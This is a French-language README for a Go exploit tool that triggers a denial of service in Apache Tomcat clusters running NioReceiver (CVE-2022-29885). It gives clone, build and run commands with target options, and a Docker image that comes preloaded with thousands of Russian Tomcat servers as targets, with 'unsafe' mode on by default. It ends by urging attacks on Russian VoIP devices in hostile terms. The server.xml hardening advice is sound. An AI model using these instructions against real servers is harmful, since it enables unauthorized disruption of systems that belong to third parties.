
Exploit Apache Tomcat DoS (CVE-2022-29885)
Apache Tomcat DoS (CVE-2022-29885) Exploit.
Déni de service dans EncryptInterceptor (Cluster Tomcat).
La machine cible doit démarrer le Cluster Nio Receiver.
L'envoi d'un paquet TCP spécial provoquera un déni de service sur la cible.
Que EncryptInterceptor soit utilisé ou non, il existe une possibilité de vulnérabilité de déni de service sous condition :
la fonction cluster Tomcat est activée et utilise NioReceiver pour la communication.
Toute version de Tomcat sera affectée. La seule solution est d'utiliser un réseau de confiance.
Le fichier de configuration sécurisé server.xml contient
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
Toute autre variante de configuration n'est pas sécurisée.
Application
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - URL ou nom de fichier cible
- d - indicateur debug {true, false} qui active ou désactive les journaux
- s - commutateur de régime sûr et non sûr. La valeur par défaut est unsafe.
Docker avec 6340 serveurs Apache Tomcat ruzzian prédéfinis multipliés pour les 10 ports Tomcat les plus courants.
Le mode Unsafe par défaut est préconfiguré.
docker run -d masterroot/cve-2022-29885
Amusez-vous avec les appareils VoIP ruzzland-terrorist-state :D

Vous êtes libre de me contacter via Keybase pour tout détail.